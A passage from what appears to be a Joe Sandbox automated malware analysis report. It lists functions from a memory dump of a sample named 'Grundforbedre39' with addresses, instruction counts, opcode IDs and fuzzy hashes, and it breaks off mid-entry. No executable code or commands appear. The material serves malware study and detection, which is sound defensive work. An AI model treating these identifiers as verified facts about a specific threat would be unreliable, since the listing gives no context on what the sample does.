                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 771ff2c5c369e153b59e94250675bc92c6fa7e5e1303ed6fcf567a9d1117c73a
                                                                                      • Instruction ID: a536158959b39d57b6dde07c43990675f1630f8d14485d39bb76713e8351c419
                                                                                      • Opcode Fuzzy Hash: 771ff2c5c369e153b59e94250675bc92c6fa7e5e1303ed6fcf567a9d1117c73a
                                                                                      • Instruction Fuzzy Hash: 434158B6A00705EFDB24CF99C980A9AB7F4FF48710B20496DE556EB260D730FA04CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355DD7A7 Relevance: .1, Instructions: 120COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3aad39132bdb3ef275b8abcb08b8aee948d9bf3fa39daf1115d81e3ff8507758
                                                                                      • Instruction ID: ba81530dffd1d7bcaa9decf69fc7426d7f06ecb242df39b30e27d1a61366543f
                                                                                      • Opcode Fuzzy Hash: 3aad39132bdb3ef275b8abcb08b8aee948d9bf3fa39daf1115d81e3ff8507758
                                                                                      • Instruction Fuzzy Hash: 39418EB27083019FD316DF68C880B2AF7E6FBC4750F46456DE89687391DA74E845CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35541796 Relevance: .1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1830fb744fd41d3ea35fdf3d71db0540930f4e894febd57ad8344b1b69a4a755
                                                                                      • Instruction ID: d2454493faeb26f3f4df777dd735800cfe11bfe3ed47761aef668fbe0ae0092f
                                                                                      • Opcode Fuzzy Hash: 1830fb744fd41d3ea35fdf3d71db0540930f4e894febd57ad8344b1b69a4a755
                                                                                      • Instruction Fuzzy Hash: 2C418DB5B04389EFDB09CF59D880B99B7F1FB88314F14816AE819AB344CB34A941CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35590227 Relevance: .1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6234a4d67ac790a3fb07485eb5fce94b3f535d893f1abcf2903ca14e4b5447d6
                                                                                      • Instruction ID: f7517098fcf2a1dbc28ef5da658cca46a8c5375ac879ecdbe8b88793c3a0e0eb
                                                                                      • Opcode Fuzzy Hash: 6234a4d67ac790a3fb07485eb5fce94b3f535d893f1abcf2903ca14e4b5447d6
                                                                                      • Instruction Fuzzy Hash: CE4180766096419FC714CF68D840AAAB7F9BF88740F440A2DF859D76A0E734F904C7A5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355201F1 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b53a84c3e0157c6fe6adf2830dab1e5ecc8ad57de228336f5422ac3662515f6
                                                                                      • Instruction ID: 041d564a122a1324acc262d9e91fcd291f6acb67975ea58d7f01aafe5fa29a2c
                                                                                      • Opcode Fuzzy Hash: 8b53a84c3e0157c6fe6adf2830dab1e5ecc8ad57de228336f5422ac3662515f6
                                                                                      • Instruction Fuzzy Hash: 15314A36605344AFEB12CBA8CC40B9EBFFAEF44350F0445A6E855D73A2C674B944CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35539194 Relevance: .1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a62679437b38edd828fb4cb46821bc9be48e1e204b594b715e2ee98332f7f772
                                                                                      • Instruction ID: e404b66f330a49e1ff02311d8a0fea492682546fa5a715e445d520c1d188faf5
                                                                                      • Opcode Fuzzy Hash: a62679437b38edd828fb4cb46821bc9be48e1e204b594b715e2ee98332f7f772
                                                                                      • Instruction Fuzzy Hash: 7031D3B6B05729AFDB22CF64CC41F9AB7B5EF85310F410199B84CA7240DB30AE448F51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355366E0 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                      • Instruction ID: 1b6e494235a47955bedb4e437a67677e761750089cd235bce4998227b5f8b934
                                                                                      • Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                      • Instruction Fuzzy Hash: 0A41ABB6200A45DFC732CF54C980FAA7BB5FF84B50F814568E84A8B6A0CB31F801DB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35514180 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5687144bff916cb9a8eb643421986b4ed0dd3c4b23915704eaaeed495b20b6e3
                                                                                      • Instruction ID: ba1eadec27e7c11b0e6c5d7f3bbd02b2ed80e0666dc55a065be2e4d914afd3fe
                                                                                      • Opcode Fuzzy Hash: 5687144bff916cb9a8eb643421986b4ed0dd3c4b23915704eaaeed495b20b6e3
                                                                                      • Instruction Fuzzy Hash: A8419C76204744DFE722CF64C480FD67BE5AF84321F81882AE95A8B660DB74F944CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35535004 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                      • Instruction ID: bcddef6e797fc656af571bec1efd839c46727273eac2f25dd10adfc9c7c08208
                                                                                      • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                      • Instruction Fuzzy Hash: 3631017520A341DFE312DE28C411B16B7E5BB85390F8089AAF8C98B280D776F841C3E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3558E79D Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: afb7d1c5e8346d6367939bfeda7614838d020663bda5eb38da0a74b97f7c6b36
                                                                                      • Instruction ID: 3c7a4901e1bb2a2d470729972687d7b432f35292ba1da3eeda639626e7ebdba3
                                                                                      • Opcode Fuzzy Hash: afb7d1c5e8346d6367939bfeda7614838d020663bda5eb38da0a74b97f7c6b36
                                                                                      • Instruction Fuzzy Hash: 1A31E9B57856C09BE3168758CD44B2977F8FF41B94F9504F0EE05AB6D1DB68F840CA12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355096E0 Relevance: .1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 84ff0f09b158a64cef1fbce7d6e12a6bde4924f9f0dbd3a0a2d41af48342970f
                                                                                      • Instruction ID: 9f3349d9128452250808ffc7b12250d3f1009686639d710ec6aa5e7723829155
                                                                                      • Opcode Fuzzy Hash: 84ff0f09b158a64cef1fbce7d6e12a6bde4924f9f0dbd3a0a2d41af48342970f
                                                                                      • Instruction Fuzzy Hash: C121DE7AA04718AFC3228F588840B6A7BF5FBC5B64F520829A5659B381DB30FD01CFD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550D64A Relevance: .1, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                      • Instruction ID: a5c018c19d34c56c01052a4421f8bbf69caaeaf8e73fb1b515e2be6a29b345c0
                                                                                      • Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                      • Instruction Fuzzy Hash: 7D31757A604644EFD711CE54CD80F6A73B9EB84798F568429ED0A9B250D774FD40CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554A5E7 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                                                      • Instruction ID: 4685c0dfd507d873d69b92cc62f70feb89c89691105eb765971de4c44194b6aa
                                                                                      • Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                                                      • Instruction Fuzzy Hash: E4315CB6B05B01AFD760CF6ADD45B57B7F9BB08B90F54092DA89AC7640EB70F8008B54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355E17BC Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                      • Instruction ID: ffc19179e5bc2b59c108b9a25414dd35fb755924da5708816a0b89480b115b7a
                                                                                      • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                      • Instruction Fuzzy Hash: 5E318EB2E00255EFC704DF69C880AADB7B1FF58315F158169D858DB341D734AA51CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355191E5 Relevance: .1, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a8e7e9bbc2d3e814be9ef05f88494a56e2e254f1794695d2b90b389cb6249f7e
                                                                                      • Instruction ID: c2b51510a78fb41445612d8935a9399f9dddefab716aea4ff93ce7393ae9a4bd
                                                                                      • Opcode Fuzzy Hash: a8e7e9bbc2d3e814be9ef05f88494a56e2e254f1794695d2b90b389cb6249f7e
                                                                                      • Instruction Fuzzy Hash: B93165B16083459FDB05CF18D84098ABBFAEF89350F05096AFD559B390DB31ED04CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550C0F6 Relevance: .1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a36042451f65e268698d6a494e4228a828634aaea230a52d72034bec8509f13
                                                                                      • Instruction ID: fa38f67c00864d688df9217bb3aae2101311cfc8c0cabc604f56d6b207e40b0d
                                                                                      • Opcode Fuzzy Hash: 2a36042451f65e268698d6a494e4228a828634aaea230a52d72034bec8509f13
                                                                                      • Instruction Fuzzy Hash: E13105B66003408BD7109F18C841B6977B4BF8131CF8599A9D845AF381DEB4FD86CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550E3C0 Relevance: .1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d6e8fea06238aba51667f0a3d5037c6104449bf60cfbb6091aea20534b9cfdc4
                                                                                      • Instruction ID: 8d443a7efe8e07b7419a73c435068d1b846bc1f6f4ba987518f2aba657c380a5
                                                                                      • Opcode Fuzzy Hash: d6e8fea06238aba51667f0a3d5037c6104449bf60cfbb6091aea20534b9cfdc4
                                                                                      • Instruction Fuzzy Hash: 7D31D435A8062CAFEB21CE14CC81FDE77B9EB45740F5104A5E645A7290D6B4AE81CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355444A8 Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d2fa3ad0940c8f1ab378e8eb70f67dc1cdf78d992287ce550f1e73248a998fff
                                                                                      • Instruction ID: a8ea77d53892398815a4791be1ec9557904910cfaad97bac00cda41f10a83b68
                                                                                      • Opcode Fuzzy Hash: d2fa3ad0940c8f1ab378e8eb70f67dc1cdf78d992287ce550f1e73248a998fff
                                                                                      • Instruction Fuzzy Hash: 53212CB5A40648EBCF11CFA8C9C0A9BBBB5FF48365F508479ED059B251D6B0EE058B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 355443D0 Relevance: .1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 41780acb7c354066c8d0fb92868e0f4cb8f9c0e22bc1dd42e129d6ee2a2c82ac
                                                                                      • Instruction ID: bb5137f8a39dd56670c0899da151f272a37d6bf05524b28129b4cb98920a89fe
                                                                                      • Opcode Fuzzy Hash: 41780acb7c354066c8d0fb92868e0f4cb8f9c0e22bc1dd42e129d6ee2a2c82ac
                                                                                      • Instruction Fuzzy Hash: 90218EB6648745DBC711CF54C890B5B77E5FB88761F414919F848AB280EB70F9018BA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3550E328 Relevance: .1, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ae488574ebe23b936318810a405008e93e80984b2c0607df02d880afc92e29c0
                                                                                      • Instruction ID: 42f492be0faf7517c46a38a06a9ed4a20db49068eeac77e08e1fe280fe72e9ff
                                                                                      • Opcode Fuzzy Hash: ae488574ebe23b936318810a405008e93e80984b2c0607df02d880afc92e29c0
                                                                                      • Instruction Fuzzy Hash: 40318835600644AFE715CB68C880F9ABBB9FF84354F2449A9E515DB280EB70FA01CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3554D450 Relevance: .1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6543f3a474b9f344997e2e22b7859389a7efef0258133d2ee2fe142afcfded21
                                                                                      • Instruction ID: cec27f92a5c91f120f0b0835010c9cadd755b6b92883e199b248698f49ecb572
                                                                                      • Opcode Fuzzy Hash: 6543f3a474b9f344997e2e22b7859389a7efef0258133d2ee2fe142afcfded21
                                                                                      • Instruction Fuzzy Hash: D521BFB6618344AFD710DF28E940F5A77F8ABC4655F860C19B9059B290EF30F945CBE2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35590371 Relevance: .1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8183fd78022f8c9f8b41485a4b55d679a0e7f995f34dfefa7786a26088c6c26f
                                                                                      • Instruction ID: ad46359cc9f2090560a53a9f9806974cd43406ea072a08a7388d253f77b2ee76
                                                                                      • Opcode Fuzzy Hash: 8183fd78022f8c9f8b41485a4b55d679a0e7f995f34dfefa7786a26088c6c26f
                                                                                      • Instruction Fuzzy Hash: 1D217C72A00629ABCF14DF59C881AFEB7F4FF48744B91046AE401EB250D778AD42CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3553F24A Relevance: .1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69c195a3189068303f57af3f3cdfe3eb55acd34ac4728b34706f80ab0957ac2a
                                                                                      • Instruction ID: d3b45f094dc415bb82d648adb6dc4b2a75e6c08c3f40678d42c20b892ef66188
                                                                                      • Opcode Fuzzy Hash: 69c195a3189068303f57af3f3cdfe3eb55acd34ac4728b34706f80ab0957ac2a
                                                                                      • Instruction Fuzzy Hash: A621AC75202204EFD719CF95C842F56BBAAFF85365F51416DE00ACB2A0EBB4F800CA94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 35549580 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 83fdeb804b958492fdd84e141993f3fb3002a6c7051f7cec353e05700268e5a8
